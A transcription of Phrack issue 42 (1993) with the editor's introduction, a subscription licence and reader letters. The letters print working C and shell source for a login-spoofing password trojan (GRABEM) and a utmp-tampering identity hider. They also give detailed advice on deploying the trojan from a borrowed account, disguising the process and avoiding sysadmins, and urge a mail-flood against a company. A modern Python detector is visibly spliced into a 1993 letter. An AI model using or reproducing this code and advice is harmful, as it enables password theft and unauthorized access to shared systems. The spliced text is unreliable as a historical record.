==Phrack Magazine==

Volume Four, Issue Forty-Two, File 1 of 14

Issue 42 Index

___________________

P H R A C K   4 2

March 1, 1993

___________________

~ Happy Anniversary Bill Cook & Tim Foley, we love you both! ~

Here it is. Amidst all the fanfare and hoopla, Phrack 42 leaps from your electronic mail box to infect your very soul.

It was just a few short years ago on this day that one of the greatest abuses of governmental authority took place in the happy little town of Austin, Texas. This issue marks the three year anniversary of these raids and a hearty hello goes out to Bellcore, The United States Secret Service, and the US District Attorney's Office.

As many of you have read previously, or otherwise heard through the electronic grapevines, Dispater is no longer editor of Phrack. Your new editor, as I was most recently referred to so lovingly by my long-time friend John Lee on the alt.cyberpunk Usenet group: "the long hair and heavy metal beer drinking Texan that Bruce Sterling finds so .. ahem.. 'attractive'." In case you don't get the joke, my name is Erikb, and I'm a hacker.

There are a few very distinct differences beginning with this issue of Phrack. First and foremost, Phrack is now registered with the Library of Congress, and has its own ISSN. Yes, boys and girls, you can go to Washington, D.C. and look it up. This adds a new era of legitimacy to Phrack in that with such a registration, Phrack should never again face any legal challenge that would bypass any paper based magazine.

After much deliberation, I have concluded that Phrack will no longer provide the world's anti-hacker corporate and governmental types (IE: THE MAN) such valuable information for free. This will of course have absolutely no effect on YOU, the hackers of the world. Phrack has always been, and will always continue to be yours to copy and distribute amongst yourselves without limitation, as long as the files remain unchanged and intact.
Entities who register their subscriptions to Phrack will be providing valuable demographic information to Phrack and its readers on exactly who outside our community actually takes an active interest in us. Yes, it will also generate some income. The proceeds of all monies earned by Phrack will be used to actually compensate contributors for articles of interest, and most importantly, help a certain person pay off the debt incurred by the twist of fate dealt him through his involvement with this publication in the past. I have no interest in making any money off of Phrack, as if I were to show a profit, I would have to contribute to Tim Foley's expense account via the IRS and I have absolutely no desire to fund his antics further than I am already forced to.

To keep things honest, any information about the financial affairs of Phrack will be made available to anyone who cares to write and ask. Thus, we can all see if "THE MAN" is truly as ethical as he would have us believe, especially since our rate will be considerably less than many magazines (or military screwdrivers).

Now, pertaining to "THE MAN." Phrack does not care for you and the way you secretly read and profit from Phrack and then use the information contained within its files to oppress its publishers, contributors and readers. Henceforth, anyone involved with any ties to a computer profession for any corporation, the military or the federal government, any person with any ties to any telecommunications company, network service provider or interconnect carrier, any person with any ties to any law enforcement body, federal, state or otherwise, any elected officials, attorneys, accountants or computer consultants of any kind must register your subscription immediately. If you are unsure of your status in this regard, please contact us. We are going to be VERY liberal about "special dispensations" since it is not our intention to screw anyone out of a subscription.
-------------------------------------------------------------------------

READ THE FOLLOWING IMPORTANT REGISTRATION INFORMATION

Corporate/Institutional/Government:

If you are a business, institution or government agency, or otherwise employed by, contracted to or providing any consultation relating to computers, telecommunications or security of any kind to such an entity, this information pertains to you. You are instructed to read this agreement and comply with its terms and immediately destroy any copies of this publication existing in your possession (electronic or otherwise) until such a time as you have fulfilled your registration requirements. A form to request registration agreements is provided at the end of this file.

Individual User:

If you are an individual end user whose use is not on behalf of a business, organization or government agency, you may read and possess copies of Phrack Magazine free of charge. You may also distribute this magazine freely to any other such hobbyist or computer service provided for similar hobbyists. If you are unsure of your qualifications as an individual user, please contact us as we do not wish to withhold Phrack from anyone whose occupations are not in conflict with our readership.

_______________________________________________________________

Phrack Magazine corporate/institutional/government agreement

Notice to users ("Company"): READ THE FOLLOWING LEGAL AGREEMENT. Company's use and/or possession of this Magazine is conditioned upon compliance by company with the terms of this agreement. Any continued use or possession of this Magazine is conditioned upon payment by company of the negotiated fee specified in a letter of confirmation from Phrack Magazine.

This magazine may not be distributed by Company to any outside corporation, organization or government agency.
This agreement authorizes Company to use and possess the number of copies described in the confirmation letter from Phrack Magazine and for which Company has paid Phrack Magazine the negotiated agreement fee. If the confirmation letter from Phrack Magazine indicates that Company's agreement is "Corporate-Wide", this agreement will be deemed to cover copies duplicated and distributed by Company for use by any additional employees of Company during the Term, at no additional charge.

This agreement will remain in effect for one year from the date of the confirmation letter from Phrack Magazine authorizing such continued use or such other period as is stated in the confirmation letter (the "Term"). If Company does not obtain a confirmation letter and pay the applicable agreement fee, Company is in violation of applicable US Copyright laws.

This Magazine is protected by United States copyright laws and international treaty provisions. Company acknowledges that no title to the intellectual property in the Magazine is transferred to Company. Company further acknowledges that full ownership rights to the Magazine will remain the exclusive property of Phrack Magazine and Company will not acquire any rights to the Magazine except as expressly set forth in this agreement. Company agrees that any copies of the Magazine made by Company will contain the same proprietary notices which appear in this document.

In the event of invalidity of any provision of this agreement, the parties agree that such invalidity shall not affect the validity of the remaining portions of this agreement.

In no event shall Phrack Magazine be liable for consequential, incidental or indirect damages of any kind arising out of the delivery, performance or use of the information contained within the copy of this magazine, even if Phrack Magazine has been advised of the possibility of such damages.
In no event will Phrack Magazine's liability for any claim, whether in contract, tort, or any other theory of liability, exceed the agreement fee paid by Company.

This Agreement will be governed by the laws of the State of Texas as they are applied to agreements to be entered into and to be performed entirely within Texas. The United Nations Convention on Contracts for the International Sale of Goods is specifically disclaimed.

This Agreement together with any Phrack Magazine confirmation letter constitute the entire agreement between Company and Phrack Magazine which supersedes any prior agreement, including any prior agreement from Phrack Magazine, or understanding, whether written or oral, relating to the subject matter of this Agreement. The terms and conditions of this Agreement shall apply to all orders submitted to Phrack Magazine and shall supersede any different or additional terms on purchase orders from Company.

_________________________________________________________________

REGISTRATION INFORMATION REQUEST FORM

We have approximately __________ users.

We desire Phrack Magazine distributed by (Choose one):

Electronic Mail: _________
Hard Copy:       _________
Diskette:        _________ (Include size & computer format)

Name:_______________________________ Dept:____________________
Company:_______________________________________________________
Address:_______________________________________________________
_______________________________________________________________
City/State/Province:___________________________________________
Country/Postal Code:___________________________________________
Telephone:____________________ Fax:__________________________

Send to:
Phrack Magazine
603 W. 13th #1A-278
Austin, TX 78701

-----------------------------------------------------------------------------

As many of you can imagine, this will be very hard to enforce.
This is not our main concern, as people who choose to ignore this stipulation are in direct violation of applicable US Copyright laws and therefore are just as unethical and guilty as they have always claimed we are. It would be an ironic turn of events should the FBI actually have to conduct raids against companies like Bellcore for harboring illegal copies of Phrack Magazine. If, in your travels, you happen to see such an occurrence, feel free to let us know. :)

Enjoy the magazine. It is for and by the hacking community. Period.

Editor-In-Chief   : Erik Bloodaxe (aka Chris Goggans)
3L33t             : K L & T K
News              : Datastream Cowboy
Photography       : Restricted Data Transmissions & dFx
Publicity         : (Please, God, no more press)
Prison Consultant : The English Prankster
Creative Stimulus : Sandoz, Buena Vista Studios, The Sundays
Mooks             : Dave & Bruce
Librarian         : Minor Threat
Thanks To         : Professor Falken, Vince Niel, Skylar, Rack, NOD, G. Tenet, Frosty
No Thanks To      : Scott Chasin (who didn't even care)

Phrack Magazine V. 4, #42, March 1, 1993. ISSN 1068-1035

Contents Copyright (C) 1993 Phrack Magazine, all rights reserved. Nothing may be reproduced in whole or in part without written permission of the Editor-In-Chief.

Phrack Magazine is made available quarterly to the amateur computer hobbyist free of charge. Any corporate, government, legal, or otherwise commercial usage or possession (electronic or otherwise) is strictly prohibited without prior registration, and is in violation of applicable US Copyright laws.

Phrack Magazine
603 W. 13th #1A-278
Austin, TX 78701
phrack@well.sf.ca.us

Submissions to the above email address may be encrypted with the following key:

(Not that we use PGP or encourage its use or anything. Heavens no. That would be politically-incorrect. Maybe someone else is decrypting our mail for us on another machine that isn't used for Phrack publication. Yeah, that's it.
:) )

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.1

mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
=q2KB
-----END PGP PUBLIC KEY BLOCK-----

-= Phrack 42 =-

Table Of Contents
~~~~~~~~~~~~~~~~~

 1. Introduction by The Editor                               14K
 2. Phrack Loopback / Editorial Page / Line Noise            48K
 3. Phrack Pro-Phile on Lord Digital                         22K
 4. Packet Switched Network Security by Chris Goggans        22K
 5. Tymnet Diagnostic Tools by Professor Falken              35K
 6. A User's Guide to XRAY by NOD                            11K
 7. Useful Commands for the TP3010 Debug Port by G. Tenet    28K
 8. Sprintnet Directory Part I by Skylar                     49K
 9. Sprintnet Directory Part II by Skylar                    45K
10. Sprintnet Directory Part III by Skylar                   46K
11. Guide to Encryption by The Racketeer [HFC]               32K
12. The Freedom Of Information Act and You by Vince Niel     42K
13. HoHoCon from Various Sources                             51K
14. PWN by Datastream Cowboy                                 29K

                                                   Total:   474K

Phrack 42 is dedicated to John Guinasso, director of global network security, BT North America, without whose immortal comments, many would have never been motivated to write.

"If you mess with our network and we catch you -- which we always do -- you will go down." (John Guinasso, Information Week, July 13, 1992)

"Hell, WE owned Tymnet before BT did!" (Anonymous hacker-type, Random Telephone Call, 1993)

_______________________________________________________________________________

==Phrack Magazine==

Volume Four, Issue Forty-Two, File 2a of 14

[-=:< Phrack Loopback >:=-]

============================================================================
!!!!WATCH THIS SPACE FOR SUMMERCON INFORMATION NEXT ISSUE!!!!
============================================================================

I 'found' this little C program a few days ago, and it runs on most UNIX machines I think (As I found it, I can't claim fame for writing it!).
What it does is change your userid and x25 address to anything of your choice. This only affects programs such as 'write' and 'who'. It doesn't automatically give you different access rights, so it can only be used to disguise your real identity.

Usage
-----

inv god somewhere   (Changes your uid to 'god' and X.25 to 'somewhere')
inv '' ''           (Makes you INVISIBLE on 'who')

Program invis.c
---------------

/* The header names were lost when this file was extracted; these are the
   ones the calls below need (the original listed four includes). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <utmp.h>

int main(int argc, char *argv[])
{
    FILE *f;
    struct utmp u;
    int v = ttyslot();          /* index of this terminal's slot in utmp */

    if (v == -1) {
        fprintf(stderr, "Can't find terminal.\n");
        exit(1);
    }
    if (argc != 3) {
        fprintf(stderr, "Args!\n");
        exit(1);
    }
    f = fopen("/etc/utmp", "r+");
    if (f == NULL) {
        fprintf(stderr, "Utmp has escaped!\n");
        exit(1);
    }
    /* seek to our slot, read the record, overwrite name and host, write back */
    if (fseek(f, v * sizeof(u), 0) == -1) {
        fprintf(stderr, "Garbage utmp\n");
        exit(1);
    }
    if (fread((char *)&u, sizeof(u), 1, f) != 1) {
        fprintf(stderr, "Write failed\n");
        exit(1);
    }
    strncpy(u.ut_name, argv[1], 8);
    strncpy(u.ut_host, argv[2], 16);
    if (fseek(f, v * sizeof(u), 0) == -1) {
        fprintf(stderr, "Seek failed\n");
        exit(1);
    }
    fwrite((char *)&u, sizeof(u), 1, f);
    fclose(f);
    return 0;
}

I personally have not used this program (to hack or for anything else). What you do with it is up to you....

Have fun....

(Alas, life is but an Aardvaark..)

CHEERS THEN

-------------------------------------------------------------------------------

I am interested in getting in contact with hackers in Nord Italy (I am located in Torino). Do you know anybody? Can you help TheNewHacker??
Thanks,
TheNewHacker

[Editor: Actually, we are in the process of recruiting people to write for a compilation file on the hacking scenes in countries around the world. One person is working on Italy. Perhaps when this file is completed, you will be able to network through that information. If anyone in a country other than America is interested in contributing to this effort, please write us at: phrack@well.sf.ca.us !]

-----------------------------------------------------------------------------

hello, i must say i love your publication. I have a little kind of hack/phreak for you guys. When you approach a Red light, preferably at night with few cars around, continually flash your bright lights. This tricks the light into believing this is a cop waiting behind traffic at the light, thus changing the light after about 10 flashes. I discovered that after seeing several police officers turn on their lights before they hit lights and was amazed at how easily the light changed. If you have, say, a Mag-lite the trick works if you point directly at the top of the post-light and the ones hanging right above red on verticals and right above yellow on horizontals. hope this helps etc. (i fucking hate those damn red lights)

Dave.

[Editor: I've actually tried this. It works on most major intersections]

-----------------------------------------------------------------------------

Hello!

I'd like to make just some addition to the APPENDIX A of the Racketeer's article "The POWER of Electronic Mail" - there are new guys in InterNET -> Russians (!). They have an awful connection, but it's a cool team. So, add:

.su    kremvax.hq.demos.su

And one more note, in the SMTP installed on the Sun Station I'm working on there isn't a TICK command, but there are some strange ones like RSET and EXPN.

Spy

P.S. Sorry for my bad English.

[Editor: Russia has a lot of computers online these days. Look for more on the Russian Internet in upcoming Phracks!]
-----------------------------------------------------------------------------

There is another, much simpler way to expand your password collection, other than tty spoofing. Why not just run a program that simulates the login process, and then leave it running on the console for an unsuspecting victim? A simple example is below. Execute by typing getpass:logout.

--------File: getpass----------
LOGIN=""
PASSWD=""
clear
echo -n "login: "
read LOGIN
echo "$LOGIN" >name
sleep 3
echo -n "Password:"
read PASSWD
echo "$PASSWD" >password
echo
echo -n "Login incorrect"
-------------------------------

The only problem I have is that I don't know how to make it so that the password, when entered, isn't shown on the screen. I'm sure you can come up with a solution.

[Editor: actually, someone kinda did. See the next letter]

-----------------------------------------------------------------------------

A Better UNIX Password Grabber
by The K-Man

I blame it entirely on boredom. Well, that and an acute case of end-of-semester neural gridlock. I was sitting in the lab a couple of years ago, my head leaning against a Sparc-2 display, my index finger hitting the return key over and over again at the login prompt. It was all my mind and body were capable of at the time. Then a little thought formed in the back of my mind: "You know, it would be pretty damn easy to write a program to imitate the behavior of this screen while grabbing user id's and passwords." So I logged in and started coding. Then I thought to myself, "You know, with a few extra lines of code and a couple of tricks, I could make this little guy almost completely undetectable and untraceable while running." So I coded some more.
A couple of hours later, out popped the following program:

---------------------------- Cut Here -----------------------------------
/*----------------------------------------------------------------------+
| GRABEM 1.0 by The K-Man                                                |
| A Cute little program to collect passwords on the Sun workstations.    |
+----------------------------------------------------------------------*/

#define PASSWORD  "Password:"
#define INCORRECT "\nLogin incorrect"
#define FILENAME  ".exrc%"

/* Header names were lost in extraction. stdio.h and signal.h are the two
   the original listed; the rest cover strcmp/strlen, system, getppid/kill. */
#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*-----------------------------------------------------------------------+
| ignoreSig                                                              |
|                                                                        |
| Does nothing. Used to trap SIGINT, SIGTSTP, SIGQUIT.                   |
+-----------------------------------------------------------------------*/
void ignoreSig (int sig)
{
    (void) sig;
    return;
}

/*-----------------------------------------------------------------------+
| Main                                                                   |
+-----------------------------------------------------------------------*/
int main()
{
    char name[10],        /* users name */
         password[10];    /* users password */
    int  i,               /* loop counter */
         lab,             /* lab # you're running on */
         procid;          /* pid of the shell we're under */
    FILE *fp;             /* output file */

    /*-------------------------------------------------------------------+
    | Trap the SIGINT (ctrl-C), SIGTSTP (ctrl-Z), and SIGQUIT (ctrl-\)    |
    | signals so the program doesn't stop and dump back to the shell.    |
    +-------------------------------------------------------------------*/
    signal (SIGINT,  ignoreSig);
    signal (SIGTSTP, ignoreSig);
    signal (SIGQUIT, ignoreSig);

    /*-------------------------------------------------------------------+
    | Get the parent pid so that we can kill it quickly later. Remove    |
    | this program from the account.                                     |
    +-------------------------------------------------------------------*/
    procid = getppid();
    system ("\\rm proj2");

    /*-------------------------------------------------------------------+
    | Ask for the lab # we're running on. Clear the screen.              |
    +-------------------------------------------------------------------*/
    printf ("lab#: ");
    scanf ("%d", &lab);
    for (i=1; i<40; i++)
        printf ("\n");
    getchar();

    /*-------------------------------------------------------------------+
    | Outer for loop. If the name is <= 4 characters, it's probably not  |
    | a real id. They screwed up. Give 'em another chance.               |
    +-------------------------------------------------------------------*/
    for(;;) {
        /*---------------------------------------------------------------+
        | If they hit return, loop back and give 'em the login again.    |
        +---------------------------------------------------------------*/
        for (;;) {
            printf("lab%1d login: ",lab);
            gets (name);
            if (strcmp (name, "") != 0)
                break;
        }

        /*---------------------------------------------------------------+
        | Turn off the screen echo, ask for their password, and turn the |
        | echo back on.                                                  |
        +---------------------------------------------------------------*/
        system ("stty -echo > /dev/console");
        printf(PASSWORD);
        scanf("%s",password);
        getchar();
        system ("stty echo > /dev/console");

        /*---------------------------------------------------------------+
        | Write their userid and password to the file.                   |
        +---------------------------------------------------------------*/
        if ( ( fp = fopen(FILENAME,"a") ) != NULL ) {
            fprintf(fp,"login %s has password %s\n",name,password);
            fclose(fp);
        }

        /*---------------------------------------------------------------+
        | If the name is bogus, send 'em back through                    |
        +---------------------------------------------------------------*/
        if (strlen (name) >= 4)
            break;
        else
            printf (INCORRECT);
    }

    /*-------------------------------------------------------------------+
    | Everything went cool. Tell 'em they fucked up and mis-typed and    |
    | dump them out to the REAL login prompt. We do this by killing the  |
    | parent process (console).                                          |
    +-------------------------------------------------------------------*/
    printf (INCORRECT);
    kill (procid, 9);
    return 0;
}
---------------------------- Cut Here -----------------------------------

HOW IT WORKS

You can probably figure this out by reading the code, but I thought I'd just add some comments on why I did what I did.

The first thing it does is install the signal handler. All it does is trap SIGINT, SIGTSTP, and SIGQUIT, so that the person trying to log into the machine this baby is running on can't kill it with a keystroke.

Next, it gets the parent process ID. We'll use this later to kill it off quickly. Then it proceeds to erase the executable file. Sysadmins can't find a trojan horse program that isn't there.

From here it goes on to imitate the login and password prompts. You'll probably have to change the code to get it to imitate the login process on your particular machine. When it gets a userid and password, it appends them to an existing file in the account. I chose the .exrc, but any dot file will work. The point being to use a file that already exists and should be in the account. Don't leave any extra suspicious files lying around.

After it writes the uid and password to the file, it bumps the user back to the real login prompt by killing off the shell that was the parent process of the program. The cut is almost instantaneous; the user would have to be inhumanly observant to notice the transition.

HOW TO USE

Well, first you need an account to run it from. If your site has guest accounts, you've got it made. If not, I'd suggest using a little social engineering to get one other person's account. With that account and the program, you can grab access to many more. I wouldn't recommend running it from an account that has your name on it. That just makes it a little more dangerous than it needs to be. Of course, if the sysadmin happens to catch the program running on your login, you can always claim to know nothing.
Say someone else must have gotten your password and is using your account to escape detection. He might buy it. But if you have the source for the program sitting somewhere in your account, and they find it, you're fucked. So it's best to use someone else's account for the job.

After you've gotten the account you'll be running it from, you'll need to get the program in that account somehow. I started off by keeping a copy of the source somewhere in my account, named with something innocuous and hidden among bunches of source files, but I got paranoid and started hauling the source around with me on a bar floppy. Do whatever suits your level of paranoia.

Copy the source to the account you'll be running it from and compile it. Trash the source, and name the program something that won't stand out in a ps list. selection_svc is a nice innocuous name, and it appears everywhere. Do a ps on one of your machines and look for processes that hang around for a long time. You might want to hide it as a daemon. Be creative.

Now run the program and sit back and wait. Or leave and come back later. When you know that someone has tried to log on to your booby trapped machine, log back into the account you borrowed to run the program in and vi or emacs (if you're that kind of person) out the captured userid and password. Simple as that.

Note that the two times that you stand the greatest chance of being caught are when you first compile and run the program and when you retrieve your captured uid and passwords. There's the remote chance that someone might see you at work and see what you're doing, but it's not very likely. If you start acting all paranoid you'll draw more attention to yourself than you would have gotten in the first place. If your site has dialup lines, you might want to do a dialin to retrieve the passwords. Or you might prefer to do it in person. All depends on your paranoia quotient, which you think is more secure, I guess.

TIPS

Be careful which dot files you use.
I chose the .exrc because it was something that wasn't used often at our site. If you chose the .cshrc or other frequently accessed file, put a # before the uid and password you write to that file. That way, when that dot file is sourced, it'll treat that line as a comment and not spit out an error message that could cause suspicion.

Try to run the program at a time when you know there will be heavy machine usage. That way you'll trap something quick. The longer your program runs, the greater the chance it will be found.

Don't be greedy. Run on only one or two machines at a time. And if you run on more than one machine, run out of a different account on each one. Again, the more you put out there, the better the chance that at least one will be found.

PARTING NOTE

The morning after I wrote this program was the first time I got to use it. I set it running on a guest account, then went to a machine across the room to do some legitimate work. One of my friends walks in shortly after that, and we start shooting the shit. A minute or two later, the sysadmin walks in, sits down, and logs in to the machine I ran the program on. I came really close to dropping my fudge right then and there. The only thing running through my mind was "Either I'm totally fucked, or I have root." Turned out it was choice B. Too bad the guy changed his password once a week, and I wasn't smart enough to fix it so that I would see the change. Oh well, I had fun for a week though. There were quite a few interesting e-mail messages sent back and forth that week. I think the best one was the one from our (male) department head to one of our radical she-male hard-core no-damn-gifs feminist female professors, detailing all the perverted sexual acts that he would like to perform with and on her. :)

Anyway, have fun with the program. Maybe I'll get a chance to come up with some more cool UNIX programs in the future.
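[Editor's added example, not part of K-Man's letter or of any Phrack code: the grabber above relies on two tricks, unlinking its own binary while it keeps running and ignoring SIGINT/SIGQUIT/SIGTSTP so a keystroke can't kill it. On a system with a Linux-style procfs (an assumption; the 1993 SunOS lab had no such interface), both leave traces: /proc/<pid>/exe reads "... (deleted)" and /proc/<pid>/status carries the SigIgn mask. The script below flags processes showing those traits; the process names and paths in the sample are constructed, and selection_svc is only the disguise name the letter suggests.]

```python
"""Flag processes that look like the self-deleting login spoofer described above.

Traits checked: the exec'd binary has been deleted, and INT/QUIT/TSTP are all
ignored while the process holds a terminal. Linux procfs layout is assumed.
"""
import os
from dataclasses import dataclass
from typing import Dict, List

# Signal numbers the spoofer traps (Linux/x86 numbering assumed).
SIGINT, SIGQUIT, SIGTSTP = 2, 3, 20
KEYBOARD_SIGNALS = (SIGINT, SIGQUIT, SIGTSTP)


@dataclass
class ProcInfo:
    pid: int
    comm: str
    exe: str      # target of /proc/<pid>/exe, "" if unreadable
    stdin: str    # target of /proc/<pid>/fd/0, "" if unreadable
    sigign: str   # SigIgn hex mask from /proc/<pid>/status


def exe_deleted(exe_target: str) -> bool:
    """True when the file the process was exec'd from no longer exists."""
    return exe_target.endswith(" (deleted)")


def on_terminal(stdin_target: str) -> bool:
    """True when stdin is the console, a tty or a pseudo-terminal."""
    return stdin_target.startswith(("/dev/tty", "/dev/pts/", "/dev/console"))


def ignores_keyboard_signals(sigign_hex: str) -> bool:
    """True when INT, QUIT and TSTP are all ignored (bit n-1 set for signal n)."""
    mask = int(sigign_hex, 16)
    return all((mask >> (sig - 1)) & 1 for sig in KEYBOARD_SIGNALS)


def reasons_for(p: ProcInfo) -> List[str]:
    """Why a process matches the spoofer profile; empty list means it does not."""
    reasons = []
    if exe_deleted(p.exe):
        reasons.append("executable deleted on disk")
    if on_terminal(p.stdin) and ignores_keyboard_signals(p.sigign):
        reasons.append("holds a terminal but ignores INT/QUIT/TSTP")
    return reasons


def suspicious(procs: List[ProcInfo]) -> Dict[int, List[str]]:
    """Map pid -> reasons for every process matching at least one trait."""
    found = {}
    for p in procs:
        reasons = reasons_for(p)
        if reasons:
            found[p.pid] = reasons
    return found


def _readlink(path: str) -> str:
    try:
        return os.readlink(path)
    except OSError:
        return ""


def read_proc_linux() -> List[ProcInfo]:
    """Snapshot the live process table. Needs a Linux procfs; reading other
    users' exe/fd links needs root, otherwise they come back empty."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        status = {}
        try:
            with open(f"/proc/{pid}/status") as fh:
                for line in fh:
                    key, _, value = line.partition(":")
                    status[key] = value.strip()
        except OSError:
            continue  # process exited while we were reading
        procs.append(ProcInfo(pid, status.get("Name", ""),
                              _readlink(f"/proc/{pid}/exe"),
                              _readlink(f"/proc/{pid}/fd/0"),
                              status.get("SigIgn", "0")))
    return procs


# Constructed sample snapshot (not data from a real system). The bash entry
# ignores QUIT/TSTP/TTIN/TTOU like a normal interactive shell but not INT, so
# it is not flagged; the deleted cron binary (an upgrade) is flagged on one
# trait only, the spoofer on both.
SAMPLE = [
    ProcInfo(1, "init", "/sbin/init", "/dev/null", "0000000000000000"),
    ProcInfo(812, "bash", "/bin/bash", "/dev/pts/0", "0000000000380004"),
    ProcInfo(4242, "selection_svc", "/home/guest/selection_svc (deleted)",
             "/dev/console", "0000000000080006"),
    ProcInfo(5001, "vim", "/usr/bin/vim", "/dev/pts/1", "0000000000000000"),
    ProcInfo(5100, "cron", "/usr/sbin/cron (deleted)", "/dev/null",
             "0000000000000000"),
]


if __name__ == "__main__":
    procs = read_proc_linux() if os.path.isdir("/proc") else SAMPLE
    for pid, why in sorted(suspicious(procs).items()):
        print(f"pid {pid}: {'; '.join(why)}")
```

A deleted executable alone is also what a package upgrade leaves behind, so the two-trait match is the one worth paging on; the single-trait hits are for review.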
Later,
K-Man

-----------------------------------------------------------------------------

In a recent issue of PHRACK you had some article or loopback about getting information about people via modem. I am somewhat interested in this and could use this information. I have a friend who is a part-time bounty hunter and could use such information to track people down. Could you please send me some information about who to contact to find out this information. What I could REALLY use is an on-line up-to-date phone/address book that I could call to find out anybody's address. Is there such a thing? If you have any information please e-mail me, since I am unable to get your mag on a regular basis.

Thanx a mil!

Scarface

[Editor: Actually there are quite a large number of databases that keep information on everyone. There is TRW, Equifax, TransUnion, Information America and NAI just to name a few. Many of these services are very expensive, but even services like CompuServe allow users to look up people all over America using PhoneFile which compiles data from all kinds of public records. Nexis can allow you to look up real estate data on just about anyone with loans on their houses. Every public utility and department of motor vehicles provides information on their records, and many are online. A good book to read about this kind of thing is:

Privacy For Sale, Jeffrey Rothfeder, Simon & Schuster, $22.00]

-----------------------------------------------------------------------------

THE GOLDEN ERA REBORN!

Relive the thrill of the golden era of hacking through our exclusive collection of BBS messages. Our collection contains posts from over 40 of the most popular hack/phreak BBSes of all time. Experience the birth of the computer underground again from your own computer with this collection of original posts from bulletin boards like:

* 8BBS *
* OSUNY *
* PLOVERNET *
* THE LEGION OF DOOM *
* BLACK ICE PRIVATE *
* THE PHOENIX PROJECT *

And many more...
Messages are available in many computer formats:

IBM
Amiga
Macintosh

For more information, please contact LOD Communications

email: lodcom@mindvox.phantom.com

US Mail:
LOD Communications
603 W. 13th St. Suite 1A-278
Austin, TX 78701

Voice Mail: 512-448-5098

-----------------------------------------------------------------------------

You might like this one...

--bob

****************************************

I just saw a transcript of a press conference given by Secret Service Agent Frericks, in Lubbock last December. Here is a brief extraction...

FRERICKS: Um hm. This is a major nation wide, world wide problem from an industry point of view with tremendous losses in funds tremendous losses of money. the VAX account at the University is a way to get into numerous other research accounts or Internet which is the ...you get onto Internet you can talk to anybody else who is on Internet anywhere in the world which these kids were talking to Belgium, and Israel and Australia and they can do that just by this, thus avoiding long distance phone calls. But most of the people on Internet I mean on the VAX are there legitimately for research purposes they can go to Mayo and get a file if they're a med student and they also get one of these pamphlets if they get, like the Department of Engineering gives out an account number just for that semester, the professor would give it out so you can use the VAX well they also get one of those pamphlets that explains what the rules are and the instructor spends a good bit of time the first couple of classes going over computer etiquette, computer rules.

[Editor: Another of America's finest.]

-----------------------------------------------------------------------------

I typed this because of the mention of Software Security International in the article "More than $100,000 in Illegal Software Seized" in Rambone's Pirates Cove in Phrack 41. He mentioned that they were the investigators that finally brought down APL.
I am not only familiar with that, a past friend of mine was there when the Marshals took the board. He was there as a representative of SSI. The best part that Rambone didn't know was that they couldn't get into APL to verify the existence of the software until they got the password breaker from Novell. So in essence, they looked like some dumb fools. They didn't have any idea how to approach the network.

Software Security International can be reached at...

1-800-724-4197
2020 Pennsylvania Avenue N.W.
Suite 722
Washington, D.C. 20006-1846

That is of course if they finally have gotten off the ground. Last I heard (2-3 months ago) they were still having trouble getting financial backing. They did the APL bust for nothing, just to prove they could do it. They are also on a lot of other BBS's around America. So as a warning to other sysops, cover your ass. You could rack up some serious negative cash flow by sending tons of mail to the box above, then it gets Airborne'd to Washington State.

see ya

[Editor: I think it might be a good idea to send them a few postcards every day for the next few weeks. Just to stay in touch.]

-----------------------------------------------------------------------------

==Phrack Magazine==

Volume Four, Issue Forty-Two, File 2b of 14

[-=:< Editorial >:=-]

Before I jump upwards onto my soapbox and spew forth a meaty editorial I would like to relay something to the readers of Phrack. The following is a transcript of John Lee's (Corrupt's) confession to the charges facing him. (From Security Insider Report, Jan. 1993)

What follows is in my opinion a very poor attempt at a plea-bargain, and obviously induced by attorney coercion. I must wonder what John was thinking when he agreed to this admission.

======================================================================

I agreed with others to violate various laws related to the use of computers.
I agreed to do the following:

1) I agreed to possess in excess of fifteen passwords which permitted me to gain access to various computer systems including all systems mentioned in the indictment and others. I did not have authorization to access these systems. I knew at the time that what I did was wrong.

2) I used these access devices and in doing so obtained the value of time I spent within these systems as well as the value of the passwords themselves which I acknowledge was more than $1000.

3) I intentionally gained access to what I acknowledge are Federal interest computers and I acknowledge that work had to be done to improve the security of these systems which was necessitated by my unauthorized access.

4) I was able to monitor data exchange between computer systems and by doing so intentionally obtained more passwords, identifications and other data transmitted over Tymnet and other networks.

5) I acknowledge that I and others planned to share passwords and transmitted information across state boundaries by modem or telephone lines and by doing so obtained the monetary value of the use of the systems I would otherwise have had to pay for.

Among the ways I and others agreed to carry out these acts are the following:

1. I was part of a group called MOD.

2. The members of the group exchanged information including passwords so that we could gain access to computer systems which we were not authorized to access.

3. I got passwords by monitoring Tymnet, calling phone company employees and pretending to be computer technicians, and using computer programs to steal passwords.

I participated in installing programs in computer systems that would give the highest level of access to members of MOD who possessed the secret password. I participated in altering telephone computer systems to obtain free calling services such as conference calling and free billing among others.
Finally, I obtained credit reports, telephone numbers and addresses as well as other information about individual people by gaining access to information and credit reporting services.

I acknowledge that on November 5, 1991, I obtained passwords by monitoring Tymnet.

I apologize for my actions and am very sorry for the trouble I have caused to all concerned.

John Lee

==========================================================================

This issue I would like to call attention to what I consider to be a very pressing issue. There has always been a trend to pad the amount of dollar damages incurred by any victim of a hacker attack. I personally feel that the blame is never directed at the true guilty parties. Certainly, if someone is caught breaking into a system, then they are surely guilty of some form of electronic trespass. I will also concede that such a person may or may not be guilty of other crimes based upon their actions once inside that system. What I have the most problems dealing with is the trend to blame the hacker for any expenditures needed to further secure the system. With this mindset, why should any corporation bother to add any security at all? Why not just wait until someone happens across a few poorly secured sites, nab them, and claim damages for the much needed improvements in security?

The worst culprits in this type of behavior have been the RBOCs, as was seen with the supposed damages incurred for the distribution of the "911 document" and most recently with the $370,000 damages supposedly incurred by Southwestern Bell resulting from the alleged activities of those in MOD. Perhaps this figure does have some basis in reality, or perhaps it is just an arbitrary figure dreamed up by a few accountants to be used at year end to explain some losses in the corporate stock report. Most often figures such as this factor in such ridiculous items as the actual system hardware penetrated. I can hardly see the relevance of such a charge.
